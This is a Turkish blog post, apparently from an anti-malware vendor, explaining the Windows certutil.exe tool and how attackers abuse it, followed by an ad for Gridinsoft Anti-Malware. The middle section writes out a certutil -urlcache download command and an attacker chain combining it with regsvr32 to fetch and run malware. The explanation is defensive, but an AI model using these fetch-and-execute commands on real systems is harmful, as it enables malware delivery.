Certutil.exe Virüs Indirmeye Izin Verir

Written by Robert Bailey
Certutil.exe, Microsoft Windows’ta kullanılan sertifikaları ve sertifika hizmetlerini yönetmek için kullanılan bir komut satırı aracıdır. Windows işletim sistemiyle birlikte gelir ve dijital sertifikalarla ilgili çeşitli görevleri yerine getirmek için kullanılabilir.

Certutil.exe, şunları içeren geniş bir işlev yelpazesi gerçekleştirmek için kullanılabilir:

  • Sertifikaları yönetme: Certutil.exe, Windows sertifika deposunda depolanan sertifikaları yönetebilir. Bu, sertifikaları içe ve dışa aktarma, sertifikaları silme ve sertifika ayrıntılarını görüntüleme işlemlerini içerir.
  • Sertifika iptal listelerini (CRL’ler) yönetme: Certutil.exe, yetkilileri tarafından iptal edilen sertifikaların listesi olan CRL’leri yönetmek için kullanılabilir.
  • Sertifikaları doğrulama: Certutil.exe, dijital imzasını yetkilinin genel anahtarına karşı kontrol ederek bir sertifikanın geçerliliğini doğrulamak için kullanılabilir.
  • Anahtar çiftleri oluşturma: Certutil.exe, dijital sertifikalarda kullanılmak üzere genel/özel anahtar çiftleri oluşturmak için kullanılabilir.
  • Akıllı kartları yönetme: Certutil.exe, dijital sertifikaları depolayan akıllı kartları yönetmek için kullanılabilir.

certutil.exe Yardım Sayfası

Certutil.exe, Windows ortamlarında dijital sertifikaları ve sertifika hizmetlerini yönetmek için sistem yöneticileri ve güvenlik uzmanları tarafından yaygın olarak kullanılan güçlü bir araçtır.

Certutil.exe virüs mü?

Kurulum, yedekleme, silme ve yönetim dahil olmak üzere Windows’taki sertifikalar ve sertifika depolarıyla ilgili çeşitli işlevleri gerçekleştirmek için bu programı kullanabilirsiniz.

Certutil.exe gibi herhangi bir sistem aracı, kötü amaçlı yazılımlar tarafından kötü amaçlı faaliyetler gerçekleştirmek için kullanılabilir. Kötü amaçlı yazılım geliştiricileri, bir kompromize edilmiş sisteme ek kötü amaçlı yazılım indirip yüklemek, güvenlik önlemlerini atlamak veya hassas verileri dışarı çıkarmak için Certutil.exe’yi kullanabilirler.

CertUtil’in dikkate değer bir özelliği, uzaktaki URL’lerden sertifikalar dahil dosyaları indirme ve aşağıdaki komutu kullanarak yerel olarak kaydetme yeteneğidir:

certutil.exe -urlcache -split -f [URL] output.file

Örneğin, saldırganlar “certutil -urlcache -split -f [serverURL] file.blah” komutunu “regsvr32.exe /s /u /I:file.blah scrub.dll” ile birleştirerek hedef sisteme kötü amaçlı yazılımı indirip yürütebilirler.

Kötü amaçlı yazılım geliştiricileri tarafından kullanılan yaygın bir teknik, Certutil.exe’yi uzaktaki sunuculardan şifrelenmiş kötü amaçlı dosyaları indirmek ve çözmek için kullanmaktır. Bu, Certutil.exe’yi “-decode” parametresini kullanarak Base64 kodlu içeriği çözerek veya “-urlcache” parametresini kullanarak uzaktaki sunucudan bir dosya indirerek yapılabilir.

Ancak, Certutil.exe’nin kendisi kötü amaçlı yazılım değildir ve Windows ile birlikte gelen meşru bir sistem aracıdır. Genellikle System32 dizininde depolanır ve Microsoft tarafından imzalanır, bu da değiştirme veya değiştirme girişimlerinin bir güvenlik uyarısı tetikleyeceği anlamına gelir.

Sisteminizi Certutil.exe kullanan kötü amaçlı yazılımlardan korumak için, sisteminizi ve antivirüs yazılımınızı güncel tutmak, Gridinsoft Anti-Malware gibi güvenilir bir antivirüs yazılımı kullanmak ve internetten yazılım indirirken veya bilinmeyen göndericilerden e-posta ekleri açarken dikkatli olmak önemlidir.

GridinSoft Anti-Malware İncelemesi
Onarmak ve pişman olmak yerine önlem almak daha iyidir!
Bilgisayarınızın işleyişine yabancı programların müdahalesinden bahsederken, "Önceden uyarılmak önceden hazırlıklı olmaktır" atasözü durumu mümkün olduğunca doğru bir şekilde tanımlar. Gridinsoft Anti-Malware, her zaman işe yarar bir araçtır: hızlı, verimli, güncel. En hafif enfeksiyon şüphesinde bile acil yardım olarak kullanmak uygun olacaktır.
Anti-Malware 6 günlük deneme sürümü mevcuttur.
Kullanım Koşulları | Gizlilik Politikası | 10% Off Coupon
Telegram kanalımıza abone olun ve bilgi güvenliği konusundaki haberlerden ve özel içeriklerimizden ilk siz haberdar olun!
Sending
User Review
4.42 (12 votes)
Comments Rating 0 (0 reviews)

İngilizce İspanyolca

About the author

Robert Bailey

I'm Robert Bailey, a passionate Security Engineer with a deep fascination for all things related to malware, reverse engineering, and white hat ethical hacking.

As a white hat hacker, I firmly believe in the power of ethical hacking to bolster security measures. By identifying vulnerabilities and providing solutions, I contribute to the proactive defense of digital infrastructures.

Leave a Reply

Sending